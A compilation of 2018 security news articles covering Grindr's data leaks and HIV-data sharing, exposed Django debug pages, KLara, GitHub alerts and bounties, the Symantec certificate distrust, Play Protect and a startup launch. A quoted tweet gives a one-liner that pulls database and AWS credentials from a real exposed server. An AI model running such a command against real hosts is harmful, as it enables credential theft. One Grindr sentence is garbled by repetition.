Grindr gay-dating app made the headlines again, a few days ago an NBC report revealed that the app was affected by 2 security issues (now patched) that could have exposed the information of its more than 3 million daily users.

An attacker could have exploited the feature to access location data, private messages to other users, and profile information, even if they’d opted out of sharing such information.

The security issues were identified by Trever Faden, CEO of the property management startup Atlas Lane, while he was working at his website C*ckblocked that allowed users to see who blocked them on Grindr.

Faden discovered that once a Grindr logged in his service, it was possible to access to a huge quantity of data related to their Grindr account, including unread messages, email addresses, and deleted photos.

While the media were sharing the news, another disconcerting revelation was made by BuzzFeed and the Norwegian research nonprofit SINTEF, BuzzFeed and the Norwegian research nonprofit SINTEF.BuzzFeed and the Norwegian research nonprofit SINTEF.BuzzFeed and the Norwegian research nonprofit SINTEF, Grindr has been sharing data on whether its users have HIV with two outside companies, according to BuzzFeed and the Norwegian research nonprofit SINTEF.

“SVT and SINTEF conducted an experiment the 7th of February 2018 to analyse privacy leaks in the dating application Grindr. This was realised for the Sweedish TV program “Plus granskar“, that you may watch online.” reported SINTEF.

“We discovered that Grindr contains many trackers, and shares personal information with various third parties directly from the application.”

Grindr HIV data.jpg

Profiles include sensitive information such as HIV status, when is the last time a user got tested, and whether they’re taking HIV treatment or the HIV-preventing pill PrEP.

“It is unnecessary for Grindr to track its users HIV Status using third-parties services. Moreover, these third-parties are not necessarily certified to host medical data, and Grindr’s users may not be aware that they are sharing such data with them.” added SINTEF.

The disconcerting aspect of this revelation is that Grindr has been sharing users’ HIV statuses and test dates with two companies that help optimize the app, called Apptimize and Localytics.

“The two companies — Apptimize and Localytics, which help optimize apps — receive some of the information that Grindr users choose to include in their profiles, including their HIV status and “last tested date.” BuzzFeed reports

“Because the HIV information is sent together with users’ GPS data, phone ID, and email, it could identify specific users and their HIV status, according to Antoine Pultier, a researcher at the Norwegian nonprofit SINTEF, which first identified the issue.”

In some cases, this data was not protected by encryption.

Hours after BuzzFeed’s report, Grindr told Axios that it had made a change to stop sharing users’ HIV status. The company’s security chief, Bryce Case, told Axios that he felt the company was being “unfairly … singled out” in light of Facebook’s Cambridge Analytica scandal and said that the company’s practices didn’t deviate from the industry norm.

Grindr’s chief technology officer, Scott Chen, pointed out that data was shared “under strict contractual terms that provide for the highest level of confidentiality, data security, and user privacy.”

Anyway, Grindr doesn’t sell user data to third parties.

In a statement released Monday afternoon, Grindr confirmed that it would stop sharing the HIV data.

The company also confirmed to CNNMoney that it has already deleted HIV data from Apptimize, and is in the process of removing it from Localytics.


Tens of thousands of misconfigured Django apps leak sensitive data
31.3.2018 securityaffairs Security

The security researcher Fábio Castro discovered tens of thousands of Django apps that expose sensitive data because developers forget to disable the debug mode.
Security researchers have discovered misconfigured Django applications that are exposing sensitive information, including passwords, API keys, or AWS access tokens.

Django is a very popular high-level Python Web framework that allows rapid development of Python-based web applications.

The researcher Fábio Castro explained that installs expose data because developers forget to disable the debug mode for the Django app.


@6IX7ine
28,165 thousand django running servers are exposed on the internet, many are showing secret API keys, database passwords, amazon AWS keys.

A small line http GET http://54.251.149.60:8081/ --body | grep 'DATABASE_URL\|Mysql\|AWS'#Shodan #django #hacking #cybersecurity #infosec

1:43 PM - Mar 27, 2018
278
226 people are talking about this
Twitter Ads info and privacy
Castro found 28,165 apps querying Shodan for Django installs that have debug mode enabled.

I made the same query a few hours later and I obtained 28,911 results.

Django apps

Many servers with debug mode enabled expose very, the experts discovered server passwords and AWS access tokens that could be used by hackers to gain full control of the systems.

“I found this as I was working with the Django framework on a small project,” Castro told Bleeping Computer “I noticed some error exception and then went searching on Shodan.”

“The main reason [for all the exposures] is the debug mode enabled,” Castro says. “This is not a failure from Django’s side. My recommendation is to disable debugging mode when deploying the application to production.”


Kaspersky Open Sources Internal Distributed YARA Scanner
28.3.2018 securityweek Security

Kaspersky Lab has released the source code of an internally-developed distributed YARA scanner as a way of giving back to the infosec community.

Originally developed by VirusTotal software engineer Victor Alvarez, YARA is a tool that allows researchers to analyze and detect malware by creating rules that describe threats based on textual or binary patterns.

Kaspersky Lab has developed its own version of the YARA tool. Named KLara, the Python-based application relies on a distributed architecture to allow researchers to quickly scan large collections of malware samples.

Looking for potential threats in the wild requires a significant amount of resources, which can be provided by cloud systems. Using a distributed architecture, KLara allows researchers to efficiently scan one or more YARA rules over large data collections – Kaspersky says it can scan 10Tb of files in roughly 30 minutes.

“The project uses the dispatcher/worker model, with the usual architecture of one dispatcher and multiple workers. Worker and dispatcher agents are written in Python. Because the worker agents are written in Python, they can be deployed in any compatible ecosystem (Windows or UNIX). The same logic applies to the YARA scanner (used by KLara): it can be compiled on both platforms,” Kaspersky explained.

KLara provides a web-based interface where users can submit jobs, check their status, and view results. Results can also be sent to a specified email address.

The tool also provides an API that can be used to submit new jobs, get job results and details, and retrieve the matched MD5 hashes.

Kaspersky Lab has relied on YARA in many of its investigations, but one of the most notable cases involved the 2015 Hacking Team breach. The security firm wrote a YARA rule based on information from the leaked Hacking Team files, and several months later it led to the discovery of a Silverlight zero-day vulnerability.

The KLara source code is available on GitHub under a GNU General Public License v3.0. Kaspersky says it welcomes contributions to the project.

This is not the first time Kaspersky has made available the source code of one of its internal tools. Last year, it released the source code of Bitscout, a compact and customizable tool designed for remote digital forensics operations.


GitHub Security Alerts are keeping developers’ code safer
23.3.2018 securityaffairs Security

The code hosting service GitHub confirmed that the introduction of GitHub security alerts in November allowed to obtain a significant reduction of vulnerable code libraries on the platform.
Github alerts warn developers when including certain flawed software libraries in their projects and provide advice on how to address the issue.

Last year GitHub first introduced the Dependency Graph, a feature that lists all the libraries used by a project. The feature supports JavaScript and Ruby, and the company also plans to add the support for Python this year.

GitHub Security Alerts

The GitHub security alerts feature introduced in November is designed to alert developers when one of their project’s dependencies has known flaws. The Dependency graph and the security alerts feature have been automatically enabled for public repositories, but they are opt-in for private repositories.

The availability of a dependency graph allows notifying the owners of the projects when it detects a known security vulnerability in one of the dependencies and suggests known fixes from the GitHub community.

The new feature analyzes vulnerable Ruby gems and JavaScript NPM packages based on MITRE’s Common Vulnerabilities and Exposures (CVE) list, every time a new vulnerability is discovered is added to this list and all repositories that use the affected version are identified and their maintainers informed.

“Vulnerabilities that have CVE IDs (publicly disclosed vulnerabilities from the National Vulnerability Database) will be included in security alerts. However, not all vulnerabilities have CVE IDs—even many publicly disclosed vulnerabilities don’t have them.” states GitHub.

“This is the next step in using the world’s largest collection of open source data to help you keep code safer and do your best work. The dependency graph and security alerts currently support Javascript and Ruby—with Python support coming in 2018.”

Github Users can choose to receive the alerts via the user interface or via email.

An initial scan conducted by GitHub revealed more than 4 million vulnerabilities in more than 500,000 repositories. Github notified affected users by December 1, more than 450,000 of the vulnerabilities were addressed either by updating the affected library or removing it altogether.

According to GitHub, vulnerabilities are in a vast majority of cases addressed within a week by active developers.

“By December 1 and shortly after we launched, over 450,000 identified vulnerabilities were resolved by repository owners either removing the dependency or changing to a secure version.” GitHub said. “Additionally, 15 percent of alerts are dismissed within seven days—that means nearly half of all alerts are responded to within a week. Of the remaining alerts that are unaddressed or unresolved, the majority belong to repositories that have not had a contribution in the last 90 days.”


Cisco Meraki Offers Up to $10,000 in Bug Bounty Program
19.3.2018 securityweek Security

Cisco Meraki, a provider of cloud-managed IT solutions, announced last week the launch of a public bug bounty program with rewards of up to $10,000 per vulnerability.

Cisco Meraki, which resulted from Cisco’s acquisition of Meraki in late 2012, started with a private bug bounty program on the Bugcrowd platform. The private program led to the discovery of 39 flaws, for which the company paid out an average of roughly $1,100.

The firm has now decided to open its bug bounty program to all the white hat hackers on Bugcrowd and it’s prepared to pay them between $100 and $10,000 per flaw.Cisco Meraki

The initiative covers the meraki.com, ikarem.io, meraki.cisco.com and network-auth.com domains and some of their subdomains, the Meraki Dashboard mobile apps for Android and iOS, and products such as the Cisco Meraki MX Security Appliances, Meraki MS Switches, MR Access Points, MV Security Cameras, MC Phones, Systems Manager, and Virtual Security Appliances.

The highest rewards can be earned for serious vulnerabilities in websites (except meraki.cisco.com), and all hardware and software products. Researchers can receive between $6,000 and $10,000 for remote code execution, root logic, sensitive information disclosure, and device configuration hijacking issues.

There is a long list of security issues that are not covered by the program, including denial-of-service (DoS) attacks, SSL-related problems and ones that require man-in-the-middle (MitM) access, clickjacking, and classic self-XSS.

“We invest heavily in tools, processes and technologies to keep our users and their networks safe, including third party audits, features like two-factor authentication and our out-of-band cloud management architecture,” said Sean Rhea, engineering director at Cisco Meraki. “The Cisco Meraki vulnerability rewards program is an important component of our security strategy, encouraging external researchers to collaborate with our security team to help keep networks safe.”

Meraki says its wireless, switching, security, and communications products are used by more than 230,000 global customers for 3 million devices.


GitHub Paid $166,000 in Bug Bounties in 2017

16.3.2018 securityweek Security

Git repository hosting service GitHub paid a total of $166,495 in rewards in 2017 to security researchers reporting vulnerabilities as part of its four year old bug bounty program.

Total payouts more than doubled compared to the $81,700 paid in 2016 and were nearly equal to the total bounties paid during the first three years of the program: $177,000. During the first two years of the program, the company paid $95,300 in bug bounties.

Throughout the year, the company received a total of 840 submissions to the program, but resolved and rewarded only 121 of them (15%). In 2016, GitHub rewarded 73 of the 795 valid reports it received, with only 48 submissions being deemed high enough to appear on bug bounty program’s page.

The number of valid reports fueled the increase in total payouts and also resulted in GitHub re-evaluating its payout structure in October 2017. Thus, the bug bounties were doubled, with the minimum and maximum payouts now at $555 and $20,000.

With the program continuously growing participation by researchers, program initiatives, and the rewards paid out, 2017 proved the biggest year yet, GitHub’s Greg Ose points out.

Last year, the company also announced the introduction of GitHub Enterprise to the bug bounty program, allowing researchers to find vulnerabilities in areas that may not be exposed on GitHub.com or which are specific to enterprise deployments.

“In the beginning of 2017, a number of reports impacting our enterprise authentication methods prompted us to not only focus on this internally, but also identify how we could engage researchers to focus on this functionality,” Ose notes.

He also says GitHub has launched its first researcher grant, an initiative the company has been long focused on. This effort involves paying “a fixed amount to a researcher to dig into a specific feature or area of the application.” Any discovered vulnerability would also be rewarded through the Bug Bounty program.

Last year, GitHub also rolled out private bug bounties, which allowed it to limit the impact of vulnerabilities in production. The company also rolled out internal improvements to the program, to more efficiently triage and remediate submissions and plans on refining the process in 2018 as well.

GitHub is looking to expand the initiatives that proved successful in 2017, launching more private bounties and research grants to gain focus on various features before and after they publicly launch. The company also plans additional promotions later this year.

“Given the program’s success, we’re also looking to see how we can expand its scope to help secure our production services and protect GitHub’s ecosystem. We’re excited for what’s next and look forward to triaging and fixing your submissions this year,” Ose concludes.


Vast Majority of Symantec Certificates Already Replaced: DigiCert
15.3.2018 securityweek Security

Less than 1% of the top 1 million websites have yet to replace Symantec-issued certificates before major browsers distrust them, DigiCert announced this week.

Last year, DigiCert bought the Certification Authority (CA) business run by Symantec, one of the oldest and largest CAs, after a series of issues observed over the past couple of years triggered major browser vendors to announce plans to remove trust in digital certificates issued by the CA.

Later this year, both Chrome and Firefox will stop trusting certificates issued by Symantec, and others might follow suite. The move will affect all certificates issued before DigiCert acquired the Symantec CA division, including those issued under the GeoTrust, RapidSSL, Thawte, and VeriSign brands.

DigiCert, which said last year it would ensure the newly acquired division won’t repeat previous errors, is determined to help all websites owners get replacement certificates and says the process is nearly complete.

Less than 1% of the top 1 million sites still use Symantec-issued certificates that will be affected by upcoming browser distrust action. According to DigiCert, it is ready to help their owners get replacement certificates before the beta releases of Firefox 60 and Chrome 66 in the next couple of months.

“Certificates replaced by DigiCert ahead of Chrome 66 distrust timelines will also satisfy Mozilla Firefox requirements,” the company says.

Last year, Google announced plans to distrust all Symantec certificates with the release of Chrome 70, while Mozilla said earlier this week it would make a similar move with the release of Firefox 63 in October 2018.

In preparation for this action, DigiCert started issuing trusted certificates for the Symantec, Thawte, GeoTrust and RapidSSL brands on Dec. 1, 2017. Since then, the company has issued millions of certificates, including new and free replacement certificates and says that “the vast majority of Symantec brand certificate holders have taken corrective action.”

To receive replacement certificates, customers need to go through a typical renewal process in the portal where they made the original purchase. DigiCert offers the certificate replacements for free, extended through the original validity period.

A web tool is available to help identify impacted certificates: simply entering a domain name confirms whether it runs a Symantec-issued certificate that needs to be replaced. The tool can help organizations identify any certificate affected by the release of Chrome 70 and Firefox 63 later this year.

All Symantec certificates that were issued before June 2016 are set to be distrusted in Chrome 66 and Firefox 60, set to arrive in April and May, respectively. Certificates Symantec issued between June 1, 2016 and Nov. 30, 2017 will be distrusted in Chrome 70 and Firefox 63, both set for an October release.

“We’ve been working hard for months to make sure that customers are aware of the Chrome and Mozilla deadlines and that they can replace Symantec-issued certificates through us for free. Through comprehensive communications and tools in multiple languages, alongside our partners, we are continuing to provide instructions and the simplest replacement path available for those who still need to act,” Jeremy Rowley, chief of product for DigiCert, said.

All of the certificates that DigiCert has issued for Symantec, Thawte, GeoTrust and RapidSSL brands since Dec. 1, 2017 are fully trusted by the browsers.


Google Reviews Over 50 Billion Android Apps Daily
15.3.2018 securityweek Security

Play Protect, the security service that arrived on Android last year, reviews more than 50 billion apps each day, Google claims.

Launched in May 2017, Google Play Protect brings together various security services for Android, many of which have been available for years, but without being as visible as they are now. Mainly designed to protect users from Potentially Harmful Apps (PHAs), it reviews not only billions of apps, but other potential sources of PHAs as well and user devices, to take action when necessary.

Play Protect was designed to automatically check Android devices for PHAs at least once a day, and also provides users with the possibility to conduct additional reviews at any time. Because of these daily checks, nearly 39 million PHAs were removed last year, the Internet giant reveals.

Android Malicious AppsAccording to Google, Play Protect uses various tactics to keep users and their data safe, including machine learning, which helped detect 60.3% of all Potentially Harmful Apps, a number expected to increase in the future.

Play Protect also receives updates to harden it to malicious trends detected across the ecosystem, the company says. Because nearly 35% of new PHA installations were occurring when the device wasn’t connected to a network, offline scanning was enabled in Play Protect in October 2017, resulting in 10 million more PHA installs being prevented.

Compared to 2016, 65% more applications submitted to Google Play were reviewed. The company removed over 700,000 Android applications from Google Play last year. According to Google, users downloading apps exclusively from Play were nine times less likely to get a PHA compared to those downloading from other sources.

However, Play Protect also protects users outside the Google Play, and has decreased the installation rates of PHAs from other sources than the official store by more than 60%, Google notes in a blog post.

In addition to keeping users safe from harmful applications, Google focused on improving the process of delivering security updates for Android devices in 2017. Thus, 30% more devices received security patches than in 2016, the company says.

The Android Security Rewards Program and built-in security features of the Android platform allowed the company to patch critical security vulnerabilities in Android before they were publicly disclosed. Last year, the company also launched Google Play Security Rewards Program, which offers bonus bounties for select critical vulnerabilities in apps hosted on the official store.

Throughout 2017, Google paid $1.28 million in rewards to researchers reporting vulnerabilities in Android (over $2 million were awarded since the program started). The top payouts for exploits targeting TrustZone and Verified Boot were increased from $50,000 to $200,000, while payouts for remote kernel exploits from $30,000 to $150,000.

At the 2017 Mobile Pwn2Own competition, no exploits successfully compromised the Google Pixel, while those demonstrated against devices running Android did not work on devices running unmodified Android source code from the Android Open Source Project (AOSP).

In January 2018, Google revealed that it did pay a team of researchers over $100,000 for a working remote exploit chain targeting Pixel devices.

Released in fall last year, Android Oreo brought a series of security improvements as well, including more secure network protocols, increased user control over identifiers, hardened kernel, and more.

“We’re pleased to see the positive momentum behind Android security, and we’ll continue our work to improve our protections this year, and beyond. We will never stop our work to ensure the security of Android users,” Dave Kleidermacher, Vice President of Security for Android, Play, ChromeOS, said.


Cloud Security Firm Luminate Emerges From Stealth
14.3.2018 securityweek Security

Luminate, a U.S. and Israel-based company that specializes in securing access to corporate applications in hybrid cloud environments, emerged from stealth mode on Wednesday with $14 million in funding.

The company’s Secure Access Cloud software-as-a-service (SaaS) platform relies on BeyondCorp, a zero-trust enterprise security model developed by Google that shifts access controls from the network perimeter to individual devices and users.

Specifically, Luminate provides a secure communications channel between users and corporate resources and applications stored in a hybrid cloud.

Secure Access Cloud, which the company claims can be deployed in less than 5 minutes, hides all corporate resources from external networks and only provides access to authenticated users and validated devices. The connection is terminated automatically as soon as the session has been completed.

The solution provides protection not only for employees, but also supply chain partners, contractors, business partners, customers and automated processes.

Luminate

The product does not require the installation of any software on end-user devices, configuration changes, or architectural modifications, and it can be easily integrated with all existing cloud and data center technologies, Luminate says.

“Luminate's solution takes the BeyondCorp philosophy as a starting point and transforms security in corporate IT networks. Luminate provides a unified security stack on all environments that allows only point-to-point, ad-hoc user access to specific corporate resources, wherever they are hosted. At no point in time is the corporate network exposed,” said Ofer Smadari, CEO of Luminate. “Our platform deploys in less than five minutes and, once in place, provides full visibility and complete governance of users' actions when accessing corporate resources.”

Luminate received a total of $14 million in seed and Series A funding from U.S. Venture Partners, Aleph Venture Capital, and ScaleUp, a Microsoft program for tech startups. The funding will be used to expand operations in the United States and develop its channels and customer base.

Luminate was founded in January 2017 by Smadari, Leonid Belkind, and Eldad Livni, and in the past 14 months it has been working on developing and deploying its product, which is allegedly already being used by global financial, technology, and consumer services organizations.